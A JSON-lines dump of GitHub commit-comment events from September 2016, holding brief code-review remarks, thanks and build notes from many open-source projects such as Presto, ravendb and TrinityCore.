{"id":"4622437653","type":"CommitCommentEvent","actor":{"login":"ayende"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":19186321,"position":22,"line":37,"path":"src/Sparrow/Json/ArenaMemoryAllocator.cs","commit_id":"6300e22069cf04a3c823135b3fac1b369d28687e","created_at":"2016-09-27T07:32:40Z","updated_at":"2016-09-27T07:32:40Z","body":"Not really, we might have multiple servers in the same process.\r\nI also removed the global tracking anyway in favor of thread local one."}},"created_at":"2016-09-27T07:32:40Z"}
{"id":"4622438533","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19186325,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-27T07:32:52Z","updated_at":"2016-09-27T07:32:52Z","body":"OK I will check it :)"}},"created_at":"2016-09-27T07:32:52Z"}
{"id":"4622442377","type":"CommitCommentEvent","actor":{"login":"ganbarli"},"repo":{"name":"ganbarli/PHP-SBCS"},"payload":{"comment":{"id":19186329,"position":null,"line":null,"path":null,"commit_id":"606a407c83fa9a8ca2ce1e901acf881bc0faedea","created_at":"2016-09-27T07:33:48Z","updated_at":"2016-09-27T07:33:48Z","body":"You can download master.zip from project homepage  :\r\nhttps://github.com/ganbarli/PHP-SBCS/archive/master.zip"}},"created_at":"2016-09-27T07:33:48Z"}
{"id":"4622443681","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19186333,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-27T07:34:10Z","updated_at":"2016-09-27T07:34:10Z","body":":)"}},"created_at":"2016-09-27T07:34:10Z"}
{"id":"4622443737","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19186334,"position":null,"line":null,"path":null,"commit_id":"882cb07ecd337964542d3b57ffdaf0c71558a9f2","created_at":"2016-09-27T07:34:10Z","updated_at":"2016-09-27T07:34:10Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#BYfrQYV6R4O7Uo3YxZdSog"}},"created_at":"2016-09-27T07:34:10Z"}
{"id":"4622448214","type":"CommitCommentEvent","actor":{"login":"losipiuk"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19186340,"position":null,"line":null,"path":null,"commit_id":"c5202648a36eb42bf9699f295b336779b711dc7d","created_at":"2016-09-27T07:35:19Z","updated_at":"2016-09-27T07:35:19Z","body":"should then systemMemoryReservation include the revocable part or just hold the unrevocable?"}},"created_at":"2016-09-27T07:35:19Z"}
{"id":"4622452505","type":"CommitCommentEvent","actor":{"login":"Vinochikki"},"repo":{"name":"Vinochikki/Ansible"},"payload":{"comment":{"id":19186349,"position":null,"line":null,"path":null,"commit_id":"4567757e8ad9a9f58c58bc2469ba0c0aba289835","created_at":"2016-09-27T07:36:25Z","updated_at":"2016-09-27T07:36:25Z","body":"Mitaka Release"}},"created_at":"2016-09-27T07:36:25Z"}
{"id":"4622455806","type":"CommitCommentEvent","actor":{"login":"DanAnastasyev"},"repo":{"name":"volodden/YaPyN"},"payload":{"comment":{"id":19186353,"position":null,"line":null,"path":null,"commit_id":"5109903dc256801bc4a19290d6be4291b33459f0","created_at":"2016-09-27T07:37:17Z","updated_at":"2016-09-27T07:37:17Z","body":"gitignore лучше было бы [стандартный](https://github.com/github/gitignore/blob/master/VisualStudio.gitignore) брать"}},"created_at":"2016-09-27T07:37:17Z"}
{"id":"4622456236","type":"CommitCommentEvent","actor":{"login":"alemangui"},"repo":{"name":"alemangui/pizzicato"},"payload":{"comment":{"id":19186354,"position":null,"line":null,"path":null,"commit_id":"c1765054fb73daf30b348fb5c8c167ad91e11589","created_at":"2016-09-27T07:37:24Z","updated_at":"2016-09-27T07:37:24Z","body":"It sure will 👍  Thanks for the PR, we'll check these stuff together next time. "}},"created_at":"2016-09-27T07:37:24Z"}
{"id":"4622457413","type":"CommitCommentEvent","actor":{"login":"Adarsh-MR"},"repo":{"name":"Citrus-CAF/vendor_citrus"},"payload":{"comment":{"id":19186358,"position":null,"line":null,"path":null,"commit_id":"11be3814b00c853bd0be7788e899f57e7daf36ce","created_at":"2016-09-27T07:37:42Z","updated_at":"2016-09-27T07:37:42Z","body":"O.o"}},"created_at":"2016-09-27T07:37:42Z"}
{"id":"4622457983","type":"CommitCommentEvent","actor":{"login":"losipiuk"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19186359,"position":51,"line":382,"path":"presto-main/src/main/java/com/facebook/presto/operator/OperatorContext.java","commit_id":"b1e469442aefe9c9f206d5b02c68b7706525988c","created_at":"2016-09-27T07:37:51Z","updated_at":"2016-09-27T07:37:51Z","body":"@pnowojski would you want me to do sth about it? Some simillar protocol like for memory futures?\r\nOr this is fine?"}},"created_at":"2016-09-27T07:37:51Z"}
{"id":"4622458919","type":"CommitCommentEvent","actor":{"login":"samuelrey"},"repo":{"name":"samuelrey/MovieMe"},"payload":{"comment":{"id":19186361,"position":1,"line":1,"path":".settings/org.eclipse.core.resources.prefs","commit_id":"4aea97afb4db348bcdd637e3ddb011727a21e0d3","created_at":"2016-09-27T07:38:03Z","updated_at":"2016-09-27T07:38:03Z","body":"How do the eclipse settings files affect the project?"}},"created_at":"2016-09-27T07:38:03Z"}
{"id":"4622462519","type":"CommitCommentEvent","actor":{"login":"losipiuk"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19186369,"position":12,"line":96,"path":"presto-main/src/main/java/com/facebook/presto/operator/OperatorContext.java","commit_id":"b1e469442aefe9c9f206d5b02c68b7706525988c","created_at":"2016-09-27T07:38:59Z","updated_at":"2016-09-27T07:38:59Z","body":"iff is read as `if and only if`"}},"created_at":"2016-09-27T07:38:59Z"}
{"id":"4622463509","type":"CommitCommentEvent","actor":{"login":"mymanagementgithub"},"repo":{"name":"ben-public/jsskill"},"payload":{"comment":{"id":19186371,"position":2,"line":2,"path":"README.md","commit_id":"c496e4a5b33bf7880fdff335ad38b17f4ad24ec3","created_at":"2016-09-27T07:39:15Z","updated_at":"2016-09-27T07:39:15Z","body":"fdsf"}},"created_at":"2016-09-27T07:39:15Z"}
{"id":"4622464514","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19186372,"position":null,"line":null,"path":null,"commit_id":"25e1e6a8eb6a94327a9890bd97272c7f4c63bf6d","created_at":"2016-09-27T07:39:30Z","updated_at":"2016-09-27T07:39:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#QOWIASk2Q7mRCbyJ28ftAQ"}},"created_at":"2016-09-27T07:39:30Z"}
{"id":"4622466466","type":"CommitCommentEvent","actor":{"login":"dewaldh"},"repo":{"name":"dewaldh/HelloGit"},"payload":{"comment":{"id":19186378,"position":null,"line":null,"path":null,"commit_id":"3dec1fbdc8088deb4e016a116771d8b965d1ebca","created_at":"2016-09-27T07:39:59Z","updated_at":"2016-09-27T07:39:59Z","body":"This is a test commit"}},"created_at":"2016-09-27T07:39:59Z"}
{"id":"4622469407","type":"CommitCommentEvent","actor":{"login":"tplavcic"},"repo":{"name":"percona/percona-server"},"payload":{"comment":{"id":19186383,"position":19,"line":142,"path":"build-ps/debian/percona-server-server-5.6.postinst","commit_id":"bf2e9068f8269fb32d2c36918bc067b383b6d950","created_at":"2016-09-27T07:40:46Z","updated_at":"2016-09-27T07:40:46Z","body":"Thank you for the comment! There is a possibility that it's not working as intended (although I don't see activity on the bugs reported) so I've opened internal ticket so that this gets re-checked."}},"created_at":"2016-09-27T07:40:46Z"}
{"id":"4622476883","type":"CommitCommentEvent","actor":{"login":"rbnpi"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":19186391,"position":null,"line":null,"path":null,"commit_id":"687fde45e88b1efe7ad7673971ba67ea4c73b6c3","created_at":"2016-09-27T07:42:40Z","updated_at":"2016-09-27T07:42:40Z","body":"Now sorted with commit #ff299b"}},"created_at":"2016-09-27T07:42:40Z"}
{"id":"4622477006","type":"CommitCommentEvent","actor":{"login":"j-bo"},"repo":{"name":"Vayel/GUCEM-BVC"},"payload":{"comment":{"id":19186392,"position":36,"line":33,"path":"bvc/models/command.py","commit_id":"bfb7cd58e5306059808c01180a9aec608714da4f","created_at":"2016-09-27T07:42:41Z","updated_at":"2016-09-27T07:42:41Z","body":"Je pense qu'il vaut mieux décorréler les commandes adhérent/grosses commandes, voir #2 ?"}},"created_at":"2016-09-27T07:42:41Z"}
{"id":"4622482699","type":"CommitCommentEvent","actor":{"login":"yeputons"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19186403,"position":141,"line":204,"path":"pagespeed/system/redis_cache.cc","commit_id":"75fb7f5a261674c0107b25cd97f4d6f530e601e1","created_at":"2016-09-27T07:44:08Z","updated_at":"2016-09-27T07:44:08Z","body":"I'd say that this routine should iterate over all connections and query stats of all Redis nodes to show it on the statistics page."}},"created_at":"2016-09-27T07:44:08Z"}
{"id":"4622486270","type":"CommitCommentEvent","actor":{"login":"losipiuk"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19186408,"position":45,"line":443,"path":"presto-main/src/main/java/com/facebook/presto/execution/SqlTaskManager.java","commit_id":"726f2fadcfb874fa52faa2d5995bd9d9c62f68ba","created_at":"2016-09-27T07:45:03Z","updated_at":"2016-09-27T07:45:03Z","body":"Simplified even further so plain `long` is used here. And `AtomicLong` is only used internally in `requestRevoking`."}},"created_at":"2016-09-27T07:45:03Z"}
{"id":"4622488779","type":"CommitCommentEvent","actor":{"login":"MillionIntegrals"},"repo":{"name":"MillionIntegrals/pisces"},"payload":{"comment":{"id":19186414,"position":19,"line":47,"path":"src/main/scala/pisces/actors/WorkerActor.scala","commit_id":"fe7e6635d49b9676044a036acde0e3c385c70ddf","created_at":"2016-09-27T07:45:40Z","updated_at":"2016-09-27T07:45:40Z","body":"You can do map(processword) instead of map { word => processWord(word) }"}},"created_at":"2016-09-27T07:45:40Z"}
{"id":"4622490546","type":"CommitCommentEvent","actor":{"login":"MillionIntegrals"},"repo":{"name":"MillionIntegrals/pisces"},"payload":{"comment":{"id":19186419,"position":6,"line":6,"path":"src/main/scala/pisces/reader.scala","commit_id":"fe7e6635d49b9676044a036acde0e3c385c70ddf","created_at":"2016-09-27T07:46:06Z","updated_at":"2016-09-27T07:46:06Z","body":"Come on, make it at least uppercase Reader."}},"created_at":"2016-09-27T07:46:06Z"}
{"id":"4622493592","type":"CommitCommentEvent","actor":{"login":"MillionIntegrals"},"repo":{"name":"MillionIntegrals/pisces"},"payload":{"comment":{"id":19186423,"position":2,"line":2,"path":"src/main/scala/pisces/reader.scala","commit_id":"fe7e6635d49b9676044a036acde0e3c385c70ddf","created_at":"2016-09-27T07:46:51Z","updated_at":"2016-09-27T07:46:51Z","body":"Does this file do anything in this program?"}},"created_at":"2016-09-27T07:46:51Z"}
{"id":"4622494748","type":"CommitCommentEvent","actor":{"login":"pnowojski"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19186425,"position":12,"line":96,"path":"presto-main/src/main/java/com/facebook/presto/operator/OperatorContext.java","commit_id":"b1e469442aefe9c9f206d5b02c68b7706525988c","created_at":"2016-09-27T07:47:08Z","updated_at":"2016-09-27T07:47:08Z","body":"..."}},"created_at":"2016-09-27T07:47:08Z"}
{"id":"4622495386","type":"CommitCommentEvent","actor":{"login":"MillionIntegrals"},"repo":{"name":"MillionIntegrals/pisces"},"payload":{"comment":{"id":19186427,"position":null,"line":null,"path":null,"commit_id":"fe7e6635d49b9676044a036acde0e3c385c70ddf","created_at":"2016-09-27T07:47:18Z","updated_at":"2016-09-27T07:47:18Z","body":"Cool"}},"created_at":"2016-09-27T07:47:18Z"}
{"id":"4622496702","type":"CommitCommentEvent","actor":{"login":"MillionIntegrals"},"repo":{"name":"MillionIntegrals/pisces"},"payload":{"comment":{"id":19186430,"position":null,"line":null,"path":null,"commit_id":"912ab1dc66bb04de60515d79c3449b418396e9b4","created_at":"2016-09-27T07:47:37Z","updated_at":"2016-09-27T07:47:37Z","body":"Very nice."}},"created_at":"2016-09-27T07:47:37Z"}
{"id":"4622496812","type":"CommitCommentEvent","actor":{"login":"sillyfellow"},"repo":{"name":"aleicher/go-static-api"},"payload":{"comment":{"id":19186431,"position":46,"line":46,"path":"routes/routes.go","commit_id":"5e6aef86cbe80781d8520183a46b780b344be02f","created_at":"2016-09-27T07:47:39Z","updated_at":"2016-09-27T07:47:39Z","body":"this is really good."}},"created_at":"2016-09-27T07:47:39Z"}
{"id":"4622498321","type":"CommitCommentEvent","actor":{"login":"Gnimuc"},"repo":{"name":"wudixiaopeng/MRF"},"payload":{"comment":{"id":19186435,"position":null,"line":null,"path":null,"commit_id":"61b007121e197f4f09da54e491dfb9b42d5e32a1","created_at":"2016-09-27T07:48:01Z","updated_at":"2016-09-27T07:48:01Z","body":"need more comments"}},"created_at":"2016-09-27T07:48:01Z"}
{"id":"4622498833","type":"CommitCommentEvent","actor":{"login":"pnowojski"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19186437,"position":51,"line":382,"path":"presto-main/src/main/java/com/facebook/presto/operator/OperatorContext.java","commit_id":"b1e469442aefe9c9f206d5b02c68b7706525988c","created_at":"2016-09-27T07:48:09Z","updated_at":"2016-09-27T07:48:09Z","body":"I don't know if this can be easily solved"}},"created_at":"2016-09-27T07:48:09Z"}
{"id":"4622502807","type":"CommitCommentEvent","actor":{"login":"wowharley"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19186442,"position":null,"line":null,"path":null,"commit_id":"9c220e8f55eaa8cfc93ed26ea7318430e5c6749b","created_at":"2016-09-27T07:49:04Z","updated_at":"2016-09-27T07:49:04Z","body":"awesome work :)"}},"created_at":"2016-09-27T07:49:04Z"}
{"id":"4622503804","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19186443,"position":null,"line":null,"path":null,"commit_id":"aeb20951bbac5453d5a4db22d23516ba8f948275","created_at":"2016-09-27T07:49:19Z","updated_at":"2016-09-27T07:49:19Z","body":">I hate travis, learn from buildbot\r\n\r\njust build locally or apply the changes in a fork"}},"created_at":"2016-09-27T07:49:19Z"}
{"id":"4622505103","type":"CommitCommentEvent","actor":{"login":"martinthomson"},"repo":{"name":"ietf-wg-acme/acme"},"payload":{"comment":{"id":19186445,"position":null,"line":null,"path":null,"commit_id":"2258367a139a08796e9c712ca223db604b7495c2","created_at":"2016-09-27T07:49:38Z","updated_at":"2016-09-27T07:49:38Z","body":"self-signed is not a necessary condition "}},"created_at":"2016-09-27T07:49:38Z"}
{"id":"4622505454","type":"CommitCommentEvent","actor":{"login":"kkalavantavanich"},"repo":{"name":"munggumy/hello-world"},"payload":{"comment":{"id":19186446,"position":null,"line":null,"path":null,"commit_id":"ee7d157e34e46dbbde447bbf9c665748fe8ae289","created_at":"2016-09-27T07:49:44Z","updated_at":"2016-09-27T07:49:44Z","body":"Hello\r\n"}},"created_at":"2016-09-27T07:49:44Z"}
{"id":"4622506590","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"dysonance/Indicators.jl"},"payload":{"comment":{"id":19186447,"position":5,"line":6,"path":".travis.yml","commit_id":"2131c08307f01f17542321a315e20aa21931f65c","created_at":"2016-09-27T07:50:01Z","updated_at":"2016-09-27T07:50:01Z","body":"you'll want to add 0.4 and 0.5 separately, release will switch to 0.5 so you won't be testing against 0.4 any more if you leave it this way"}},"created_at":"2016-09-27T07:50:01Z"}
{"id":"4622507223","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19186448,"position":null,"line":null,"path":null,"commit_id":"2aac83173bbf0f92e0737b596988034aec3edbe0","created_at":"2016-09-27T07:50:10Z","updated_at":"2016-09-27T07:50:10Z","body":"@lucabrivio Thanks, I didn't know this. I will reschedule the tuning session."}},"created_at":"2016-09-27T07:50:10Z"}
{"id":"4622507496","type":"CommitCommentEvent","actor":{"login":"jrieken"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19186449,"position":10,"line":625,"path":"src/vs/vscode.d.ts","commit_id":"a8894fbf0edb35e3aab742b4c540b25c11ac60cc","created_at":"2016-09-27T07:50:13Z","updated_at":"2016-09-27T07:50:13Z","body":"hehe"}},"created_at":"2016-09-27T07:50:13Z"}
{"id":"4622509636","type":"CommitCommentEvent","actor":{"login":"andybak"},"repo":{"name":"DjangoAdminHackers/django-admin-row-actions"},"payload":{"comment":{"id":19186450,"position":24,"line":28,"path":"django_admin_row_actions/admin.py","commit_id":"dff532127de8ed17396d2f6b3f77052ab421c536","created_at":"2016-09-27T07:50:44Z","updated_at":"2016-09-27T07:50:44Z","body":":-)\r\n\r\nThe W293 rule doesn't seem to come from PEP8 as far as I can tell and it goes against both my editor's default config, my own muscle memory and - if I might be a touch overly dramatic - all taste and decency... So - to hell with E293  http://stackoverflow.com/questions/2727988/python-indentation-in-empty-lines"}},"created_at":"2016-09-27T07:50:44Z"}
{"id":"4622510669","type":"CommitCommentEvent","actor":{"login":"AndreyTsvetkov"},"repo":{"name":"Fridrirh/sommelier"},"payload":{"comment":{"id":19186454,"position":9,"line":7,"path":"js/viewmodel.js","commit_id":"eda59c614e27aab9ac09e1b25954fb5f0f626671","created_at":"2016-09-27T07:50:58Z","updated_at":"2016-09-27T07:50:58Z","body":"то, что надо! (это чуть медленнее, чем было, но значительно выразительнее; переписать на цикл стоит только если это реально узкое место в производительности, и с комментарием, почему автор считает, что это так. по умолчанию у нас приветствуется декларативный код) \r\n\r\nТолько я бы еще исключил использование ненужной тут jQuery,  ведь map есть прямо на массиве. "}},"created_at":"2016-09-27T07:50:58Z"}
{"id":"4622518125","type":"CommitCommentEvent","actor":{"login":"meharryp"},"repo":{"name":"KragleStudios/gmFactionWars"},"payload":{"comment":{"id":19186458,"position":30,"line":68,"path":"gamemode/core/chat_commands/command_definitions_sv.lua","commit_id":"8beb2b5b0bc1f34ef418ef14cd34ad982a94b68e","created_at":"2016-09-27T07:52:47Z","updated_at":"2016-09-27T07:52:47Z","body":"5 seconds is a bit excessive"}},"created_at":"2016-09-27T07:52:47Z"}
{"id":"4622518230","type":"CommitCommentEvent","actor":{"login":"mones88"},"repo":{"name":"mones88/python-tidal"},"payload":{"comment":{"id":19186459,"position":null,"line":null,"path":null,"commit_id":"600577159d8f17ed480cad63769544d40768a48c","created_at":"2016-09-27T07:52:48Z","updated_at":"2016-09-27T07:52:48Z","body":"Hi @arnesongit,\r\n\r\nit shouldn't be tied with my account. In fact, to obtain it, I sniffed the app's network traffic and then changed some numbers of the clientUniqueKey.\r\nPlease, try to change it yourself.\r\n\r\nBye,\r\nSimone."}},"created_at":"2016-09-27T07:52:48Z"}
{"id":"4622518318","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19186460,"position":null,"line":null,"path":null,"commit_id":"b11fedc744a83bb644d1bf12dd5708191901c823","created_at":"2016-09-27T07:52:50Z","updated_at":"2016-09-27T07:52:50Z","body":"这个我是直接改/usr/share/devtools/makepkg-x86_64.conf的"}},"created_at":"2016-09-27T07:52:50Z"}
{"id":"4622519544","type":"CommitCommentEvent","actor":{"login":"maximeguerreiro"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":19186461,"position":null,"line":null,"path":null,"commit_id":"b3e1b589d78aec15d81cf49e4c4afd9cd28f6fb6","created_at":"2016-09-27T07:53:09Z","updated_at":"2016-09-27T07:53:09Z","body":"@thess Why? https://github.com/nfc-tools/libnfc/releases\r\n1.7.1 being the latest release, was this deprecation really required?"}},"created_at":"2016-09-27T07:53:09Z"}
{"id":"4622527874","type":"CommitCommentEvent","actor":{"login":"skovhus"},"repo":{"name":"avajs/ava-codemods"},"payload":{"comment":{"id":19186475,"position":null,"line":null,"path":null,"commit_id":"84df9d50703229e69387875e503db309932b575a","created_at":"2016-09-27T07:55:07Z","updated_at":"2016-09-27T07:55:07Z","body":"Ah, forgot about the missing babel transformation. :)"}},"created_at":"2016-09-27T07:55:07Z"}
{"id":"4622539698","type":"CommitCommentEvent","actor":{"login":"overRiver"},"repo":{"name":"BIgerMe/PHP"},"payload":{"comment":{"id":19186496,"position":null,"line":null,"path":null,"commit_id":"2a4363e9902caf349b20bdad3b1ebdc0e12aa9be","created_at":"2016-09-27T07:57:53Z","updated_at":"2016-09-27T07:57:53Z","body":"good commit!"}},"created_at":"2016-09-27T07:57:53Z"}
{"id":"4622540728","type":"CommitCommentEvent","actor":{"login":"daveols"},"repo":{"name":"localz/react-native-health-card"},"payload":{"comment":{"id":19186497,"position":null,"line":null,"path":null,"commit_id":"0bfa7769675ca338c9f0e0a3f4570130b30cab79","created_at":"2016-09-27T07:58:08Z","updated_at":"2016-09-27T07:58:08Z","body":":("}},"created_at":"2016-09-27T07:58:08Z"}
{"id":"4622541456","type":"CommitCommentEvent","actor":{"login":"abhishekwebcode"},"repo":{"name":"abhishekwebcode/session_helper"},"payload":{"comment":{"id":19186500,"position":null,"line":null,"path":null,"commit_id":"4ddea371b0cb6d46c1139af1272793b7147d990d","created_at":"2016-09-27T07:58:18Z","updated_at":"2016-09-27T07:58:18Z","body":"Add device session"}},"created_at":"2016-09-27T07:58:18Z"}
{"id":"4622542873","type":"CommitCommentEvent","actor":{"login":"ngaut"},"repo":{"name":"pingcap/tidb"},"payload":{"comment":{"id":19186506,"position":5,"line":57,"path":"store/tikv/gc_worker.go","commit_id":"854f9fe77b6e921c3e3c32658d7717097d42ded7","created_at":"2016-09-27T07:58:38Z","updated_at":"2016-09-27T07:58:38Z","body":"s/start/start at/\r\nWe should also use comma to separate the information"}},"created_at":"2016-09-27T07:58:38Z"}
{"id":"4622544019","type":"CommitCommentEvent","actor":{"login":"overRiver"},"repo":{"name":"SherlockRunningWater/mynewworld"},"payload":{"comment":{"id":19186508,"position":null,"line":null,"path":null,"commit_id":"6ccfb4d9566b1440b3d1bd8cd16a082d4aeea140","created_at":"2016-09-27T07:58:55Z","updated_at":"2016-09-27T07:58:55Z","body":"ruoji"}},"created_at":"2016-09-27T07:58:55Z"}
{"id":"4622545264","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"csgillespie/efficientR"},"payload":{"comment":{"id":19186511,"position":null,"line":null,"path":null,"commit_id":"fcccd8cd3838c8126f0bbdd4af594538da92dfab","created_at":"2016-09-27T07:59:13Z","updated_at":"2016-09-27T07:59:13Z","body":"I've double checked this - looks much better, good work. Have tweaked it, referenced the R Manual (which I think is sensible for a number of reasons, not least that will ensure people get up-to-date advice long after this is published) and added a warning that some packages will not work when byte compiled."}},"created_at":"2016-09-27T07:59:13Z"}
{"id":"4622545627","type":"CommitCommentEvent","actor":{"login":"alotaibit"},"repo":{"name":"RiyadhDataGeeks/ECOM_SEA_Prep"},"payload":{"comment":{"id":19186512,"position":null,"line":null,"path":null,"commit_id":"205588ab760918050ae482bfc6b5255942b856a5","created_at":"2016-09-27T07:59:18Z","updated_at":"2016-09-27T07:59:18Z","body":"Check the included R file to understand what are the different versions for. Basically nothing major just the output features."}},"created_at":"2016-09-27T07:59:18Z"}
{"id":"4622545880","type":"CommitCommentEvent","actor":{"login":"kofelo123"},"repo":{"name":"kofelo123/smartitcording"},"payload":{"comment":{"id":19186514,"position":null,"line":null,"path":null,"commit_id":"a28fa14b34801befa4bff25bb3dd0046530439ed","created_at":"2016-09-27T07:59:22Z","updated_at":"2016-09-27T07:59:22Z","body":"등록하면 게시글이 깨져서 web.xml에 인코딩필터수정\r\n아마 모든 url에 적용되게끔 하는 utf-8 인코딩 필터"}},"created_at":"2016-09-27T07:59:22Z"}
{"id":"4622546143","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"csgillespie/efficientR"},"payload":{"comment":{"id":19186517,"position":null,"line":null,"path":null,"commit_id":"fcccd8cd3838c8126f0bbdd4af594538da92dfab","created_at":"2016-09-27T07:59:26Z","updated_at":"2016-09-27T07:59:26Z","body":"P.s. see my PR for more."}},"created_at":"2016-09-27T07:59:26Z"}
{"id":"4622547729","type":"CommitCommentEvent","actor":{"login":"jparkSF"},"repo":{"name":"jparkSF/fgsf_contacts"},"payload":{"comment":{"id":19186520,"position":4,"line":18,"path":".gitignore","commit_id":"35ae4dde1e1f64ac831ae62d2f094327ab433142","created_at":"2016-09-27T07:59:50Z","updated_at":"2016-09-27T07:59:50Z","body":"oh I see now! for that reason, it totally makes sense! Forgot this is a public repo =)"}},"created_at":"2016-09-27T07:59:50Z"}
{"id":"4622551015","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19186524,"position":null,"line":null,"path":null,"commit_id":"8f9904cf72102ccbc1363fd0c6e1487c2d424397","created_at":"2016-09-27T08:00:31Z","updated_at":"2016-09-27T08:00:31Z","body":"Joli!"}},"created_at":"2016-09-27T08:00:31Z"}
{"id":"4622554651","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"avajs/ava-codemods"},"payload":{"comment":{"id":19186525,"position":null,"line":null,"path":null,"commit_id":"84df9d50703229e69387875e503db309932b575a","created_at":"2016-09-27T08:01:19Z","updated_at":"2016-09-27T08:01:19Z","body":"@skovhus No worries. It was like that even before your changes."}},"created_at":"2016-09-27T08:01:19Z"}
{"id":"4622560234","type":"CommitCommentEvent","actor":{"login":"dysonance"},"repo":{"name":"dysonance/Indicators.jl"},"payload":{"comment":{"id":19186530,"position":5,"line":6,"path":".travis.yml","commit_id":"2131c08307f01f17542321a315e20aa21931f65c","created_at":"2016-09-27T08:02:37Z","updated_at":"2016-09-27T08:02:37Z","body":"Is there a way to add this line without creating a new PR?"}},"created_at":"2016-09-27T08:02:37Z"}
{"id":"4622564971","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19186536,"position":null,"line":null,"path":null,"commit_id":"76edb6b28de33f1569425ae51ce912e41487b74d","created_at":"2016-09-27T08:03:39Z","updated_at":"2016-09-27T08:03:39Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XRi5uqCeRD6bv7ZfJkrI3Q"}},"created_at":"2016-09-27T08:03:39Z"}
{"id":"4622570623","type":"CommitCommentEvent","actor":{"login":"nagarkar"},"repo":{"name":"nagarkar/plasticsandpcbs"},"payload":{"comment":{"id":19186541,"position":null,"line":null,"path":null,"commit_id":"a38d17d7d613e6c44c8d9d76fa04af07c274c9ff","created_at":"2016-09-27T08:04:46Z","updated_at":"2016-09-27T08:04:46Z","body":"Cool. I assume you sent a pr. I'll send the review asap\n\nOn Sep 26, 2016 11:41 PM, \"singhpri\" <notifications@github.com> wrote:\n\n> I have deleted app1 and renamed newapp as \"physicians-review\". Renamed the\n> components and added a local gitignore file as well. Please review and give\n> feedback.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/nagarkar/plasticsandpcbs/commit/a38d17d7d613e6c44c8d9d76fa04af07c274c9ff#commitcomment-19185863>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFGMJnmL8Q5FmJ0JSKBAUgaW7UUV5s5Uks5quLp9gaJpZM4KHToW>\n> .\n>\n"}},"created_at":"2016-09-27T08:04:46Z"}
{"id":"4622573399","type":"CommitCommentEvent","actor":{"login":"topless"},"repo":{"name":"gae-init/gae-init"},"payload":{"comment":{"id":19186543,"position":null,"line":null,"path":null,"commit_id":"7741e2184bec821831fa76c4696efdf82f0a36b7","created_at":"2016-09-27T08:05:21Z","updated_at":"2016-09-27T08:05:21Z","body":"Super clean, very nice 💯 "}},"created_at":"2016-09-27T08:05:21Z"}
{"id":"4622574096","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"dysonance/Indicators.jl"},"payload":{"comment":{"id":19186544,"position":5,"line":6,"path":".travis.yml","commit_id":"2131c08307f01f17542321a315e20aa21931f65c","created_at":"2016-09-27T08:05:31Z","updated_at":"2016-09-27T08:05:31Z","body":"travis-only changes don't need re-tagging"}},"created_at":"2016-09-27T08:05:31Z"}
{"id":"4622575790","type":"CommitCommentEvent","actor":{"login":"vpswede"},"repo":{"name":"Albin-Eriksson/ARPGamingDev.Altis"},"payload":{"comment":{"id":19186547,"position":null,"line":null,"path":null,"commit_id":"3f923deb7705d50eaad685c0afee0a407cc6bb11","created_at":"2016-09-27T08:05:54Z","updated_at":"2016-09-27T08:05:54Z","body":"Lägger bara in en snabb komment om varför du fixade detta så vi vet om det fixade det.\r\n\r\nDenna ändrades för att det fanns ingen storagefee eller likande på prowlern eller quilinen och vi tror det gjorde så att ens bank blev nollad"}},"created_at":"2016-09-27T08:05:54Z"}
{"id":"4622576256","type":"CommitCommentEvent","actor":{"login":"a0119754"},"repo":{"name":"a0119754/CS3210Assignment"},"payload":{"comment":{"id":19186548,"position":null,"line":null,"path":null,"commit_id":"d70515b9acd8b9776adb1398c8851913c695fac0","created_at":"2016-09-27T08:06:00Z","updated_at":"2016-09-27T08:06:00Z","body":"Results of base:\r\nCPU: 5.93, 5.57, 5.62 (average: 5.706666667)\r\nGPU: 12.83, 12.82, 12.82 (average: 12.82333333)\r\n\r\n"}},"created_at":"2016-09-27T08:06:00Z"}
